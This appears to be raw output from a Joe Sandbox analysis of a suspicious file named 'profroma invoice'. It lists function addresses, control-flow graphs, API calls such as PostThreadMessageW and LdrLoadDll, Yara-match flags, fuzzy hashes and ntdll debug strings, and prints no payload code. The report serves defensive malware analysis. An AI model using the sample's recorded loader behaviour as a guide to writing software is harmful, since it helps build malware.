                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 272 1762b60-1762b6c LdrInitializeThunk
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                          • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                          • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                          • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                                          Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                          • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                          • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                          • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                                          Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                          • Instruction ID: aed9606ee08badf7a23248ad7d5174f471a0b4191f1a393b34f8bfbd2925981e
                                                          • Opcode Fuzzy Hash: befa5f6f34f9cee2dfcb4ddb782e3837d240503cae1d937ae01bcb4aef58764c
                                                          • Instruction Fuzzy Hash: AC90023120558802D6107158C40874A400597D0301F5AC431A4424668DC6958A917222
                                                          Function 017635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                          • Instruction ID: b4217b1437d65659a256b99a2095463e0f44cce8bd75ab5093f7e387ccb1db6f
                                                          • Opcode Fuzzy Hash: 1806fd3bcd3bb71a097d62487ca7a5ce529e2411d6bb6ce6e707553ec6f249d6
                                                          • Instruction Fuzzy Hash: EB90023160960402D60071588518706500597D0201F66C431A0424578DC7958B5166A3
                                                          Function 004145AF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4145af-4145c9 1 4145cc-414607 0->1 2 414667-4146bd call 417e43 call 404993 call 425593 1->2 3 414609 1->3 20 4146dd-4146e3 2->20 21 4146bf-4146ce PostThreadMessageW 2->21 4 41460a-41460b 3->4 6 414637 4->6 7 41460d-41461f 4->7 6->4 9 414638-41463a 6->9 7->1 16 414621-414628 7->16 12 414644 9->12 13 41463c-414643 9->13 13->12 18 414635-414636 16->18 19 41462a-414633 16->19 18->6 19->18 21->20 22 4146d0-4146da 21->22 22->20
                                                          APIs
                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: t577G2K6$t577G2K6
                                                          • API String ID: 1836367815-2667467881
                                                          • Opcode ID: ceb7c13abfd14f9acb328a3e78e0a1effc0617a5ff02d39070758dc8d71a7bed
                                                          • Instruction ID: 29e5b59ae817b40a0492b9d9877405cfbecd047df74ef541c8353dda1529c221
                                                          • Opcode Fuzzy Hash: ceb7c13abfd14f9acb328a3e78e0a1effc0617a5ff02d39070758dc8d71a7bed
                                                          • Instruction Fuzzy Hash: 7531C1729062947BCB01DB759C42CDEBBA8EE9339871840AEED449B201D13E8D438BD5
                                                          Function 0041464A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 23 41464a-414685 call 42efb3 call 42f9c3 28 41468b-4146bd call 404993 call 425593 23->28 29 414686 call 417e43 23->29 34 4146dd-4146e3 28->34 35 4146bf-4146ce PostThreadMessageW 28->35 29->28 35->34 36 4146d0-4146da 35->36 36->34
                                                          APIs
                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: t577G2K6$t577G2K6
                                                          • API String ID: 1836367815-2667467881
                                                          • Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                          • Instruction ID: 8fda3ae30d1e02e1b48dbe91bdc2a1754cabd6a2c39bac0a93a85bd1a5eab231
                                                          • Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
                                                          • Instruction Fuzzy Hash: DD1106B1D4021C7EDB119AE58C81DEFBB7CDF453A8F41407AFA54A7141E2784E068BA5
                                                          Function 00414653 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 37 414653-414665 38 41466d-414685 call 42f9c3 37->38 39 414668 call 42efb3 37->39 42 41468b-4146bd call 404993 call 425593 38->42 43 414686 call 417e43 38->43 39->38 48 4146dd-4146e3 42->48 49 4146bf-4146ce PostThreadMessageW 42->49 43->42 49->48 50 4146d0-4146da 49->50 50->48
                                                          APIs
                                                          • PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 004146CA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: t577G2K6$t577G2K6
                                                          • API String ID: 1836367815-2667467881
                                                          • Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                          • Instruction ID: fd813871938eb91e280231b459abbd0e5037b6e28a91437a499ad31076d5f8c8
                                                          • Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
                                                          • Instruction Fuzzy Hash: 800104B1D0021C7ADB11AAE58C81DEFBB7CDF45398F408069FA44A7140E17C4E068BA5
                                                          Function 00417F0B Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 231 417f0b-417f14 232 417ea6-417eb7 LdrLoadDll 231->232 233 417f16-417f1c 231->233 234 417eba-417ebd 232->234 235 417f1d 233->235 236 417f1e-417f2a 235->236 237 417f2c 236->237 238 417eec-417f00 237->238 239 417f2e-417f37 237->239 238->237 240 417f02-417f06 238->240 239->235 241 417f39-417f42 239->241 240->236 242 417f08 240->242 243 417f45-417fa1 241->243 244 417ecf-417ede 241->244 242->235 245 417ee0-417ee2 244->245 246 417eeb 244->246 246->238
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417EB5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                          • Instruction ID: cee6ba3a713131cb16669297f14733702e208aa7074b7cb970d80753226a90f1
                                                          • Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
                                                          • Instruction Fuzzy Hash: 7AF02D32E88209CFDB00DF98DC45BD9B3B0FB56719F140ADAEA188B241D36555968B49
                                                          Function 0042D143 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 248 42d143-42d184 call 404a23 call 42e053 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,0041EC3E,?,?,00000000,?,0041EC3E,?,?,?), ref: 0042D17F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                          • Instruction ID: 1a0320424f6e2513cda363ed32119c93a96c745f6f302d4d30482123bd46745d
                                                          • Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
                                                          • Instruction Fuzzy Hash: F0E06D723042187BC614EE59DC41FDB73ACEFC9710F004419F908A7241CA75BA118BF8
                                                          Function 0042D193 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 253 42d193-42d1d7 call 404a23 call 42e053 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,004176B4,000000F4), ref: 0042D1D2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                          • Instruction ID: e28c5f6046658d42be081c83e7545d2ad134910e97977f916db6725ae22c6c78
                                                          • Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
                                                          • Instruction Fuzzy Hash: 19E092723002147BCA10EE5AEC41FEB73ACEFC9710F004019FD08A7241CA78B9118BB8
                                                          Function 0042D1E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 263 42d1e3-42d21f call 404a23 call 42e053 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,601A316F,?,?,601A316F), ref: 0042D21A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_profroma invoice.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                          • Instruction ID: fa5f5a3ee7dd61a2881b8e9e18f2c3305c63e6423d1f29c247da1a030937b839
                                                          • Opcode Fuzzy Hash: a25d0429e58c5588c2827f12b5b4e4ce589c6b7f4323042011048058824ffb56
                                                          • Instruction Fuzzy Hash: 5FE04F762402147BC510EB5ADC01F97775CEFC5755F508419FA0967142CB75BA11C7B4
                                                          Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 268 1762c0a-1762c0f 269 1762c11-1762c18 268->269 270 1762c1f-1762c26 LdrInitializeThunk 268->270
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                          • Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
                                                          • Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
                                                          • Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276

                                                          Non-executed Functions

                                                          Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          • Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                          • Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
                                                          • Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
                                                          • Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92
                                                          Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
                                                          • undeleted critical section in freed memory, xrefs: 0179542B
                                                          • Critical section address., xrefs: 01795502
                                                          • 8, xrefs: 017952E3
                                                          • corrupted critical section, xrefs: 017954C2
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
                                                          • Critical section debug info address, xrefs: 0179541F, 0179552E
                                                          • Thread identifier, xrefs: 0179553A
                                                          • double initialized or corrupted critical section, xrefs: 01795508
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01795543
                                                          • Invalid debug info address of this critical section, xrefs: 017954B6
                                                          • Critical section address, xrefs: 01795425, 017954BC, 01795534
                                                          • Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                          • Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
                                                          • Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
                                                          • Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61
                                                          Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
                                                          • @, xrefs: 0179259B
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          • Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                          • Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
                                                          • Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
                                                          • Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99
                                                          Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          • Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                          • Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
                                                          • Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
                                                          • Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92
                                                          Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                          • Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
                                                          • Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
                                                          • Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10
                                                          Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • VerifierDebug, xrefs: 017A8CA5
                                                          • VerifierFlags, xrefs: 017A8C50
                                                          • VerifierDlls, xrefs: 017A8CBD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
                                                          • HandleTraces, xrefs: 017A8C8F
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          • Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                          • Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
                                                          • Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
                                                          • Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92
                                                          Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                          • Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
                                                          • Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
                                                          • Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90
                                                          Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A
                                                          • LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
                                                          • apphelp.dll, xrefs: 01716496
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-204845295
                                                          • Opcode ID: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                          • Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
                                                          • Opcode Fuzzy Hash: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
                                                          • Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92
                                                          Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
                                                          • RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
                                                          • SXS: %s() passed the empty activation context, xrefs: 01792165
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
